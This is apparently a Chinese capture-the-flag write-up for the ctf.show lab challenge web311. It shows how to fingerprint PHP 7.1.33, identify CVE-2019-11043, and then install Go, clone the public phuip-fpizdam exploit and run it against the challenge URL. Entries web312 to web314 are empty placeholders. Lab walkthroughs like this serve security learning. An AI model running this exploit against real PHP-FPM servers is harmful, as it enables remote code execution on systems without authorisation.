必备知识
①虚拟机或wsl;Kali Linux / Ubuntu / Debian都可以
②需要用到go环境
③设置国内代理(我用的是22世纪的科技)
web311
1.当我们打开后发现

查看源码

用wappalyzer发现是php7.1.33版本

然后去搜索php7.1.33cve或者随便组合
发现CVE-2019-11043(详细自己问AI或者去漏洞库看下)
①安装go环境
bash
sudo apt update
sudo apt install golang git -y
验证是否装好
bash
go version
git --version
②设置国内Go代理或者抓哆啦A梦让他拿出22世纪的高科技
这里我没时间设置代理了,直接破碎虚空虚天魔掌一把抓住哆啦A梦,从其口袋中拿到了高科技
③下载 exp 源码 phuip-fpizdam
bash
git clone https://github.com/neex/phuip-fpizdam.git
#拉取下载后要进入文件夹
cd phuip-fpizdam
④拉取依赖
bash
go get -v
⑤运行exp,靶场地址末尾必须带index.php
bash
go run . "http://xxxxxx.challenge.ctf.show/index.php"
成功标志------下方红色框框



web312
持续更新中.....
web313
.......
web314
........